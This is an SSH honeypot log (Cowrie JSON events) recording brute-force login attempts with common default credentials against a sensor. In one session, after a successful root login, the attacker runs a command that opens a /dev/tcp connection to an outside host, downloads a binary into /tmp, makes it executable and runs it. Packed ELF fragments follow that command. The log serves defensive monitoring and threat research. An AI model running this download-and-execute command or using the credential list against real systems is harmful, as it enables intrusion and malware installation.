{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":55762,"dst_ip":"1.2.3.4","dst_port":22,"session":"d710f6798257","protocol":"ssh","message":"New connection: 185.255.91.51:55762 (1.2.3.4:22) [session: d710f6798257]","sensor":"my-vps","timestamp":"2025-09-08T14:52:41.787040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:52:41.790294Z","src_ip":"185.255.91.51","session":"d710f6798257"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:52:41.887995Z","src_ip":"185.255.91.51","session":"d710f6798257"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:52:42.282999Z","src_ip":"185.255.91.51","session":"d710f6798257"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:52:42.382641Z","src_ip":"185.255.91.51","session":"0e5cdb30cd55"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:52:42.383820Z","src_ip":"185.255.91.51","session":"d710f6798257"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":47154,"dst_ip":"1.2.3.4","dst_port":22,"session":"8634c7dc6866","protocol":"ssh","message":"New connection: 158.51.124.56:47154 (1.2.3.4:22) [session: 8634c7dc6866]","sensor":"my-vps","timestamp":"2025-09-08T14:53:06.962043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:53:06.962867Z","src_ip":"158.51.124.56","session":"8634c7dc6866"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:53:07.101366Z","src_ip":"158.51.124.56","session":"8634c7dc6866"}
{"eventid":"cowrie.login.failed","username":"webapp","password":"1234567890","message":"login attempt [webapp/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T14:53:07.695827Z","src_ip":"158.51.124.56","session":"8634c7dc6866"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:53:08.836157Z","src_ip":"158.51.124.56","session":"8634c7dc6866"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36298,"dst_ip":"1.2.3.4","dst_port":22,"session":"78682749ae6f","protocol":"ssh","message":"New connection: 212.227.235.229:36298 (1.2.3.4:22) [session: 78682749ae6f]","sensor":"my-vps","timestamp":"2025-09-08T14:53:14.702291Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:53:14.703343Z","src_ip":"212.227.235.229","session":"78682749ae6f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:53:14.825056Z","src_ip":"212.227.235.229","session":"78682749ae6f"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"Password123","message":"login attempt [hadoop/Password123] failed","sensor":"my-vps","timestamp":"2025-09-08T14:53:15.352874Z","src_ip":"212.227.235.229","session":"78682749ae6f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:53:16.476839Z","src_ip":"212.227.235.229","session":"78682749ae6f"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":39082,"dst_ip":"1.2.3.4","dst_port":22,"session":"927f53f6363a","protocol":"ssh","message":"New connection: 185.255.91.51:39082 (1.2.3.4:22) [session: 927f53f6363a]","sensor":"my-vps","timestamp":"2025-09-08T14:53:51.050625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:53:51.051466Z","src_ip":"185.255.91.51","session":"927f53f6363a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:53:51.141593Z","src_ip":"185.255.91.51","session":"927f53f6363a"}
{"eventid":"cowrie.login.failed","username":"hammer","password":"123456789","message":"login attempt [hammer/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T14:53:51.557178Z","src_ip":"185.255.91.51","session":"927f53f6363a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:53:52.649383Z","src_ip":"185.255.91.51","session":"927f53f6363a"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":44712,"dst_ip":"1.2.3.4","dst_port":22,"session":"88216c85e718","protocol":"ssh","message":"New connection: 158.51.124.56:44712 (1.2.3.4:22) [session: 88216c85e718]","sensor":"my-vps","timestamp":"2025-09-08T14:54:08.821380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:54:08.822334Z","src_ip":"158.51.124.56","session":"88216c85e718"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:54:08.960598Z","src_ip":"158.51.124.56","session":"88216c85e718"}
{"eventid":"cowrie.login.failed","username":"webguest","password":"changeme","message":"login attempt [webguest/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T14:54:09.555593Z","src_ip":"158.51.124.56","session":"88216c85e718"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:54:10.697199Z","src_ip":"158.51.124.56","session":"88216c85e718"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37796,"dst_ip":"1.2.3.4","dst_port":22,"session":"75ae07f34ce6","protocol":"ssh","message":"New connection: 212.227.235.229:37796 (1.2.3.4:22) [session: 75ae07f34ce6]","sensor":"my-vps","timestamp":"2025-09-08T14:54:27.628799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:54:27.629700Z","src_ip":"212.227.235.229","session":"75ae07f34ce6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:54:27.752731Z","src_ip":"212.227.235.229","session":"75ae07f34ce6"}
{"eventid":"cowrie.login.failed","username":"rocky","password":"changeme","message":"login attempt [rocky/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T14:54:28.285905Z","src_ip":"212.227.235.229","session":"75ae07f34ce6"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:54:29.411631Z","src_ip":"212.227.235.229","session":"75ae07f34ce6"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":60416,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5540e04300d","protocol":"ssh","message":"New connection: 185.255.91.51:60416 (1.2.3.4:22) [session: e5540e04300d]","sensor":"my-vps","timestamp":"2025-09-08T14:54:57.798864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:54:57.799847Z","src_ip":"185.255.91.51","session":"e5540e04300d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:54:57.899123Z","src_ip":"185.255.91.51","session":"e5540e04300d"}
{"eventid":"cowrie.login.failed","username":"db1inst1","password":"password1","message":"login attempt [db1inst1/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T14:54:58.335229Z","src_ip":"185.255.91.51","session":"e5540e04300d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:54:59.439165Z","src_ip":"185.255.91.51","session":"e5540e04300d"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":59460,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cdb9e29d06d","protocol":"ssh","message":"New connection: 8.138.136.155:59460 (1.2.3.4:22) [session: 4cdb9e29d06d]","sensor":"my-vps","timestamp":"2025-09-08T14:55:03.107398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T14:55:03.108460Z","src_ip":"8.138.136.155","session":"4cdb9e29d06d"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T14:55:03.109017Z","src_ip":"8.138.136.155","session":"4cdb9e29d06d"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T14:55:05.037432Z","src_ip":"8.138.136.155","session":"4cdb9e29d06d"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:55:06.255271Z","src_ip":"8.138.136.155","session":"4cdb9e29d06d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:55:07.235675Z","src_ip":"8.138.136.155","session":"4cdb9e29d06d"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T14:55:07.237829Z","src_ip":"8.138.136.155","session":"4cdb9e29d06d"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":42268,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7e0e5b75e83","protocol":"ssh","message":"New connection: 158.51.124.56:42268 (1.2.3.4:22) [session: d7e0e5b75e83]","sensor":"my-vps","timestamp":"2025-09-08T14:55:09.258049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:55:09.258840Z","src_ip":"158.51.124.56","session":"d7e0e5b75e83"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:55:09.397555Z","src_ip":"158.51.124.56","session":"d7e0e5b75e83"}
{"eventid":"cowrie.login.failed","username":"slave","password":"password","message":"login attempt [slave/password] failed","sensor":"my-vps","timestamp":"2025-09-08T14:55:09.953248Z","src_ip":"158.51.124.56","session":"d7e0e5b75e83"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54754,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0876c5361ae","protocol":"ssh","message":"New connection: 217.72.205.35:54754 (1.2.3.4:22) [session: d0876c5361ae]","sensor":"my-vps","timestamp":"2025-09-08T14:55:09.994347Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:55:09.995957Z","src_ip":"217.72.205.35","session":"d0876c5361ae"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:55:11.094805Z","src_ip":"158.51.124.56","session":"d7e0e5b75e83"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/3B19m1ta71 && chmod +x /tmp/3B19m1ta71 && /tmp/3B19m1ta71 2Y5DtXtnVYw5k1V+cK1GlqKunkO3cWlckzKMU2dxtkKAoKqURLNyfVydMY9dZ3K3RoCpoJ5csXVzUo0xjVNpe61DnaC2n0G1bXhRiDqLVHhysoyIPrZ1924HQboKvjY1TCYUpLU=\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/3B19m1ta71 && chmod +x /tmp/3B19m1ta71 && /tmp/3B19m1ta71 2Y5DtXtnVYw5k1V+cK1GlqKunkO3cWlckzKMU2dxtkKAoKqURLNyfVydMY9dZ3K3RoCpoJ5csXVzUo0xjVNpe61DnaC2n0G1bXhRiDqLVHhysoyIPrZ1924HQboKvjY1TCYUpLU=\" &","sensor":"my-vps","timestamp":"2025-09-08T14:55:13.465068Z","src_ip":"8.138.136.155","session":"4cdb9e29d06d"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/c56XtmVfAY","message":"CMD: head -c 1458464 > /tmp/c56XtmVfAY","sensor":"my-vps","timestamp":"2025-09-08T14:55:13.468251Z","src_ip":"8.138.136.155","session":"4cdb9e29d06d"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T14:55:14.379312Z","src_ip":"8.138.136.155","session":"4cdb9e29d06d"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T14:55:14.383813Z","src_ip":"8.138.136.155","session":"4cdb9e29d06d"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T14:55:14.387228Z","src_ip":"8.138.136.155","session":"4cdb9e29d06d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8e5c8505f0ac626423fced3744f79022b7d61442c5df28558f033a8f82b5369c","size":1956,"shasum":"8e5c8505f0ac626423fced3744f79022b7d61442c5df28558f033a8f82b5369c","duplicate":false,"duration":"7.2","message":"Closing TTY Log: var/lib/cowrie/tty/8e5c8505f0ac626423fced3744f79022b7d61442c5df28558f033a8f82b5369c after 7.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:55:14.389463Z","src_ip":"8.138.136.155","session":"4cdb9e29d06d"}
{"eventid":"cowrie.session.closed","duration":"11.3","message":"Connection lost after 11.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:55:14.390754Z","src_ip":"8.138.136.155","session":"4cdb9e29d06d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54878,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc07c89245c4","protocol":"ssh","message":"New connection: 212.227.235.229:54878 (1.2.3.4:22) [session: dc07c89245c4]","sensor":"my-vps","timestamp":"2025-09-08T14:55:31.596193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:55:31.597175Z","src_ip":"212.227.235.229","session":"dc07c89245c4"}
